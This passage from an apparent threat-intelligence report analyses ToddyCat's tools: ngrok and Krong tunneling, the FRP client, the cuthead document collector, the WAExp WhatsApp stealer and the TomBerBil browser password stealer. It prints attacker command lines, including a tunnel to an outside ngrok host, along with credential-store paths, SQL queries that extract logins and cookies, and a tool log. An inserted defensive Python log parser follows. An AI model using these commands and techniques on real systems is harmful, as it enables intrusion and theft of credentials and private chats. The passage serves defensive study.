  1334. <h3 id="ngrok-agent-and-krong">Ngrok agent and Krong</h3>
  1335. <p>Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user&#8217;s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.</p>
  1336. <p><a href="https://ngrok.com/docs/agent/" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.</p>
  1337. <p>The agent can be started, for instance, with the following command.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --
  1338. authtoken 2GskqGD&lt;token&gt;txB7WyV"</pre><p>
  1339. The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file <a href="https://encyclopedia.kaspersky.com/glossary/dll-sideloading/" target="_blank" rel="noopener">side-loaded</a> <strong>(<a href="https://attack.mitre.org/techniques/T1574/002/" target="_blank" rel="noopener">T1574.002 Hijack Execution Flow: DLL Side-Loading</a>)</strong> with a legitimate application digitally signed by AVG TuneUp. The tool receives, via its command-line arguments, the address and the port on which to expect a connection.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; SystemInformation.exe 0.0.0.0 54112"</pre><p>
  1340. Krong is a proxy that encrypts the data transmitted through it using the XOR function.</p>
  1341. <div id="attachment_112451" style="width: 343px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112451" class="size-full wp-image-112451" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" alt="Code snippet for deciphering received data" width="333" height="457" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png 333w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-219x300.png 219w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-255x350.png 255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-204x280.png 204w" sizes="(max-width: 333px) 100vw, 333px" /></a><p id="caption-attachment-112451" class="wp-caption-text">Code snippet for deciphering received data</p></div>
  1342. <p>This allows Krong to hide the contents of the traffic to evade detection.</p>
  1343. <h3 id="frp-client">FRP client</h3>
  1344. <p>After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP client</a>. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.</p>
  1345. <p>The attackers used two files to run the client:</p>
  1346. <ul>
  1347. <li><strong>Frpc.exe</strong>: a FRP client executable file</li>
  1348. <li><strong>Frpc.toml</strong>: a client configuration file</li>
  1349. </ul>
  1350. <p>The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.</p>
  1351. <p>After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.</p><pre class="crayon-plain-tag">c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini</pre><p>
  1352. This starts the FRP client with the configuration file &#8220;tc.ini&#8221;. The traffic is then routed from C2 through this tool.</p>
  1353. <h2 id="data-collection-tools">Data collection tools</h2>
  1354. <h3 id="cuthead-for-data-collection">Cuthead for data collection</h3>
  1355. <p>Recently, ToddyCat started using a new tool we named <strong>cuthead </strong>to search for documents. The name originated from the &#8220;file description&#8221; field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.</p>
  1356. <p>The cuthead tool accepts the following arguments:</p><pre class="crayon-plain-tag">fkw.exe &lt;date&gt; &lt;extensions&gt; [keywords]</pre><p>
  1357. <ul>
  1358. <li><strong>Date:</strong> the date when the file was last modified, in <strong>yyyyMMdd</strong> format. The search looks for files modified on that date or later</li>
  1359. <li><strong>Extensions</strong>: a string without spaces that contains file extensions separated by semicolons</li>
  1360. <li><strong>Keywords</strong>: a string without spaces that contains semicolon-delimited words to look for in file names</li>
  1361. </ul>
  1362. <p>Here is an example of a <strong>cuthead</strong> launch command.</p><pre class="crayon-plain-tag">"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx</pre><p>
  1363. In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.</p>
  1364. <p>Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (<strong><a href="https://attack.mitre.org/techniques/T1005/" target="_blank" rel="noopener">T1005 Data from Local System</a></strong>). Folders that contain the following substrings are excluded from the search.</p><pre class="crayon-plain-tag">$
  1365. Windows
  1366. Program Files
  1367. Programdata
  1368. Application Data
  1369. Program Files (x86)
  1370. Documents and Settings</pre><p>
  1371. Also, the files are excluded from the search if they meet the following criteria:</p>
  1372. <ul>
  1373. <li>The file size is greater than 50 MB (52428800 bytes).</li>
  1374. <li>The file extensions do not match those specified in the command-line parameters.</li>
  1375. <li>The names do not contain the keywords specified in the command-line parameters.</li>
  1376. </ul>
  1377. <p>A list of files found by the search is passed to the function that creates ZIP archives with the password &#8220;Unsafe404&#8221;. In different versions of the tool, this function has different names but the same purpose. The open-source tool <a href="https://github.com/icsharpcode/SharpZipLib" target="_blank" rel="noopener">icsharpcode/SharpZipLib</a> v. 0.85.4.369 is used for creating archives (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  1378. <p>Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.</p>
  1379. <h3 id="waexp-whatsapp-data-stealer">WAExp: WhatsApp data stealer</h3>
  1380. <p>This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser&#8217;s local storage files.</p>
  1381. <p>The executable accepts the following arguments.</p><pre class="crayon-plain-tag">app.exe [check|copy|start] [remote]</pre><p>
  1382. <strong>Check</strong>: checks the presence of data on the host.<br />
  1383. <strong>Copy</strong>: copies data it finds to the temporary folder.<br />
  1384. <strong>Start:</strong> first, copies the data to the temporary folder and then, packs the data into an archive file.<br />
  1385. <strong>Remote</strong>: the name of the remote host.</p>
  1386. <p>When executed with &#8220;<strong>check</strong>&#8221;, the tool begins searching for user folders. If &#8220;<strong>remote</strong>&#8221; is specified, user folders are searched along &#8220;<strong>\\[remote]\C$\users\</strong>&#8221;. If it is not specified, the malware uses the environment variable <strong>%SystemDrive%</strong> value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.</p><pre class="crayon-plain-tag">All Users
  1387. Default User
  1388. Default
  1389. Public</pre><p>
  1390. After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.</p>
  1391. <p>For Chrome, the tool opens <strong>&lt;User&gt;\Appdata\local\Google\</strong> and for Edge, <strong>&lt;User&gt;\Appdata\local\Microsoft\Edge\</strong>. Inside these, it looks for a folder with the following name inside the subfolders.</p><pre class="crayon-plain-tag">https_web.whatsapp.com_0.indexeddb.leveldb</pre><p>
  1392. For Mozilla, the tool opens <strong>&lt;User&gt;\Appdata\roaming\</strong> and looks for a folder with the following name inside the subfolders:</p><pre class="crayon-plain-tag">https+++web.whatsapp.com</pre><p>
  1393. Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example, Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.</p>
  1394. <div id="attachment_112452" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112452" class="size-large wp-image-112452" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png" width="1024" height="262" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-768x196.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-740x189.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1096x280.png 1096w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-800x204.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png 1131w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112452" class="wp-caption-text">WAExp &#8220;check&#8221; output with results for Chrome, Edge, Firefox and Thunderbird</p></div>
  1395. <p>In the image above, you can see the output of the tool running with the &#8220;<strong>check</strong>&#8221; parameter. It shows storage files for <strong>Chrome</strong>, <strong>Edge</strong> and <strong>Firefox</strong>, as well as the <strong>Thunderbird</strong> mail client detected on the host.</p>
  1396. <p>When executed with the &#8220;<strong>copy</strong>&#8221; parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default\</pre><p>
  1397. The last parameter that the tool uses is <strong>&#8220;start&#8221;</strong>. It gathers target files inside a temporary folder, as described in the <strong>copy</strong> function, and packs these into an archive with the help of the <strong>System.IO.Compression.ZipFile</strong> module (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  1398. <p>It saves the archive file under a name consisting of the word &#8216;Default&#8217; and a timestamp, without extension, at the following path:</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss</pre><p>
  1399. After that, it deletes the temporary folder, along with the web browsers&#8217; and other clients&#8217; folders containing <strong>web.whatsapp.com</strong> data.</p>
  1400. <p>The image below shows an example of WAExp output when run with the various startup parameters.</p>
  1401. <div id="attachment_112453" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112453" class="size-large wp-image-112453" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png" alt="WAExp output for its various command-line parameters" width="1024" height="510" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-703x350.png 703w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-800x398.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png 1069w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112453" class="wp-caption-text">WAExp output for its various command-line parameters</p></div>
  1402. <p>The operations shown above collect <strong>Chrome</strong> data and generate an archive, whose contents are shown below.</p>
  1403. <div id="attachment_112454" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112454" class="size-large wp-image-112454" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png" alt="Archive file containing data stolen by WAExp" width="1024" height="398" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-300x117.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-768x299.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-900x350.png 900w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-740x288.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-720x280.png 720w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-800x311.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png 1046w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112454" class="wp-caption-text">Archive file containing data stolen by WAExp</p></div>
  1404. <h3 id="tomberbil-for-stealing-passwords-from-browsers">TomBerBil for stealing passwords from browsers</h3>
  1405. <p>Besides the data they collect from hosts, attackers are also interested in gaining access to every online service the target users can reach. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (<strong><a href="https://attack.mitre.org/techniques/T1555/003/" target="_blank" rel="noopener">T1555.003 Credentials from Password Stores: Credentials from Web Browsers</a></strong>).</p>
  1406. <p>There are many open-source tools available for decrypting storage data, one of these being <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi" target="_blank" rel="noopener"><strong>mimikatz</strong></a>. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.</p>
  1407. <p>To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from <strong>Chrome </strong>and <strong>Edge</strong>. Both browsers use the <a href="https://learn.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectdata" target="_blank" rel="noopener"><strong>CryptProtectData</strong></a> feature from <strong>DPAPI </strong>(Data Protection Application Programming Interface) to encrypt data. It protects data with the current user&#8217;s password and a special encryption master key.</p>
  1408. <p>All <strong>TomBerBil </strong>variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of <strong>explorer.exe</strong>. It identifies the process users and compiles a list.</p>
  1409. <div id="attachment_112455" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112455" class="size-large wp-image-112455" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png" alt="Username identification function" width="1024" height="302" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-300x88.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-768x227.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-740x218.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-949x280.png 949w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-800x236.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png 1095w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112455" class="wp-caption-text">Username identification function</p></div>
  1410. <p>The image above shows an example of the function that identifies users by process ID. It sends a <strong>WMI </strong>request to the <strong>Win32_Process </strong>class to receive an object whose <strong>processID property </strong>equals the given PID. It then calls the <strong>GetOwner </strong>method, which returns the user and domain name for the process.</p>
  1411. <p>After this, the malware searches for the encryption key, stored in the <strong>encrypted_key </strong>field in the following browser <strong>JSON </strong>files.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Local State
  1412. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State</pre><p>
  1413. It then impersonates the users it identified and attempts to decrypt the master key using the <strong>CryptUnprotectData</strong> function. To do this, it calls the <strong>Unprotect</strong> function from the <strong>System.Security.Cryptography.ProtectedData</strong> package, which, in turn, calls <strong>CryptUnprotectData</strong> from Windows DPAPI.</p>
  1414. <div id="attachment_112456" style="width: 622px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112456" class="size-full wp-image-112456" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" alt="Calling the Unprotect function" width="612" height="76" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png 612w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10-300x37.png 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><p id="caption-attachment-112456" class="wp-caption-text">Calling the Unprotect function</p></div>
  1415. <p>The image above shows an example of the <strong>Unprotect</strong> function call, which receives an array of bytes obtained from the <strong>encrypted_key</strong> field. The value of <strong>DataProtectionScope.CurrentUser</strong> is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.</p>
  1416. <p>If the decryption is successful, the malware searches for <strong>Login Data</strong> and <strong>\Network\Cookies</strong> files inside the following folders.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Default
  1417. %LOCALAPPDATA%\Google\Chrome\User Data\Profile *</pre><p>
  1418. It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.</p><pre class="crayon-plain-tag">SELECT origin_url, username_value, password_value FROM logins
  1419. SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
  1420. expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies</pre><p>
  1421. Data retrieved this way is decrypted with the master key and saved in special files.</p>
  1422. <p>Most versions of the malware tool log their actions. Below is an example of a log file that they generate:</p><pre class="crayon-plain-tag">[+] Begin 7/28/2023 1:12:37 PM
  1423. [+] Current user SYSTEM
  1424. [*] [5516] [explorer] [UserName]
  1425. [+] Impersonate user UserName
  1426. [+] Current user UserName
  1427. [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
  1428. [+] MasterKeyBytes: 6j&lt;...&gt;k=
  1429. [&gt;] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
  1430. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
  1431. [+] Delete File C:\Windows\TEMP\tmpF319.tmp
  1432. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
  1433. [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
  1434. [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
  1435. [+] MasterKeyBytes: fv&lt;...&gt;GM=
  1436. [&gt;] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
  1437. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
  1438. [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
  1439. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
  1440. [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
  1441. [+] Recvtoself
  1442. [+] Current user SYSTEM
  1443. [+] End 7/28/2023 1:12:52 PM</pre><p>
  1444. One of the variants mimics <strong>Kaspersky Anti-Virus</strong>. This executable, written in .NET, is named <strong>avpui.exe</strong> (<strong><a href="https://attack.mitre.org/techniques/T1036/005/" target="_blank" rel="noopener">T1036.005 Masquerading: Match Legitimate Name or Location</a></strong>) and contains relevant metadata:</p>
  1445. <div id="attachment_112457" style="width: 777px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112457" class="size-full wp-image-112457" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" alt="Metadata of the tool pretending to be KAV" width="767" height="268" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png 767w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-740x259.png 740w" sizes="(max-width: 767px) 100vw, 767px" /></a><p id="caption-attachment-112457" class="wp-caption-text">Metadata of the tool pretending to be KAV</p></div>
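<p>The log format quoted above is useful to defenders as well: once a log of this shape is recovered from a host, it tells you exactly which user contexts were impersonated, which browser stores were copied, and which temporary files were created and deleted. The following Python parser is an added example written for readers of this report, not code from the report or from the TomBerBil tool; the sample log it parses is constructed from the format above, and the function and field names are the example's own.</p>

```python
"""Triage parser for the TomBerBil log format quoted above.

Added example (not code from the Securelist report or from the tool itself).
Given a recovered log it reports which user contexts were impersonated, which
browser stores were read, and which temp files were written and deleted, so the
right credentials can be invalidated and the right artifacts hunted for.
"""
import re

# Constructed sample, modelled on the log shown in the report.
SAMPLE_LOG = r"""[+] Begin 7/28/2023 1:12:37 PM
[+] Current user SYSTEM
[*] [5516] [explorer] [UserName]
[+] Impersonate user UserName
[+] Current user UserName
[+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
[+] MasterKeyBytes: 6j<...>k=
[>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
[+] Delete File C:\Windows\TEMP\tmpF319.tmp
[+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
[+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
[+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
[+] MasterKeyBytes: fv<...>GM=
[>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
[+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
[+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
[+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
[+] Recvtoself
[+] Current user SYSTEM
[+] End 7/28/2023 1:12:52 PM
"""

LINE_RE = re.compile(r"^\[(?P<tag>[+*>])\]\s+(?P<msg>.*)$")
PROC_RE = re.compile(r"^\[(?P<pid>\d+)\] \[(?P<image>[^\]]+)\] \[(?P<user>[^\]]+)\]$")
COPY_RE = re.compile(r"^Copy (?P<src>.+?) to (?P<dst>.+)$")


def _new_user():
    return {"local_state": [], "master_keys": 0, "profiles": [], "copies": [], "deleted": []}


def parse_tomberbil_log(text):
    """Parse the log into session times, enumerated processes and per-user artifacts."""
    result = {"begin": None, "end": None, "processes": [], "users": {}}
    current = None  # user currently impersonated; None while running as the original account
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        tag, msg = m.group("tag"), m.group("msg")
        if tag == "*":  # "[*] [pid] [image] [owner]" lines come from the explorer.exe enumeration
            pm = PROC_RE.match(msg)
            if pm:
                result["processes"].append((int(pm.group("pid")), pm.group("image"), pm.group("user")))
        elif msg.startswith("Begin "):
            result["begin"] = msg[len("Begin "):]
        elif msg.startswith("End "):
            result["end"] = msg[len("End "):]
        elif msg.startswith("Impersonate user "):
            current = msg[len("Impersonate user "):]
            result["users"].setdefault(current, _new_user())
        elif msg == "Recvtoself":  # token reverted; later lines run as the original account
            current = None
        elif current is None:
            continue
        elif msg.startswith("Local State File: "):
            result["users"][current]["local_state"].append(msg[len("Local State File: "):])
        elif msg.startswith("MasterKeyBytes: "):
            # the value is the unprotected DPAPI key: count it, never copy it into a report
            result["users"][current]["master_keys"] += 1
        elif msg.startswith("Profile: "):
            result["users"][current]["profiles"].append(msg[len("Profile: "):])
        elif msg.startswith("Copy "):
            cm = COPY_RE.match(msg)
            if cm:
                result["users"][current]["copies"].append((cm.group("src"), cm.group("dst")))
        elif msg.startswith("Delete File "):
            result["users"][current]["deleted"].append(msg[len("Delete File "):])
    return result


def exposed_stores(parsed):
    """(user, browser, store) for every credential or cookie database the tool copied."""
    out = []
    for user, info in parsed["users"].items():
        for src, _dst in info["copies"]:
            if "\\Google\\Chrome\\" in src:
                browser = "Chrome"
            elif "\\Microsoft\\Edge\\" in src:
                browser = "Edge"
            else:
                browser = "unknown"
            if src.endswith("\\Login Data"):
                store = "Login Data"
            elif src.endswith("\\Cookies"):
                store = "Cookies"
            else:
                store = src
            out.append((user, browser, store))
    return out


def orphaned_temp_files(parsed):
    """Temp copies that were written but never deleted (candidates for carving from disk)."""
    out = []
    for info in parsed["users"].values():
        deleted = set(info["deleted"])
        out.extend(dst for _src, dst in info["copies"] if dst not in deleted)
    return out


if __name__ == "__main__":
    parsed = parse_tomberbil_log(SAMPLE_LOG)
    print("session:", parsed["begin"], "->", parsed["end"])
    for entry in exposed_stores(parsed):
        print("exposed:", entry)
    print("orphaned temp files:", orphaned_temp_files(parsed))
```

Every store listed by <code>exposed_stores</code> should be treated as compromised for that user (password resets plus cookie and session invalidation), and the deleted temp paths are the first place to look in MFT and USN journal records for the copies the tool tried to remove.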
  1446. <p>Some versions of the tool required specific command-line parameters to start. An example can be seen below:</p>
  1447. <div id="attachment_112458" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112458" class="size-large wp-image-112458" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png" alt="A TomBerBil variant started with a parameter" width="1024" height="187" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-300x55.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-768x140.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-740x135.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-800x146.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112458" 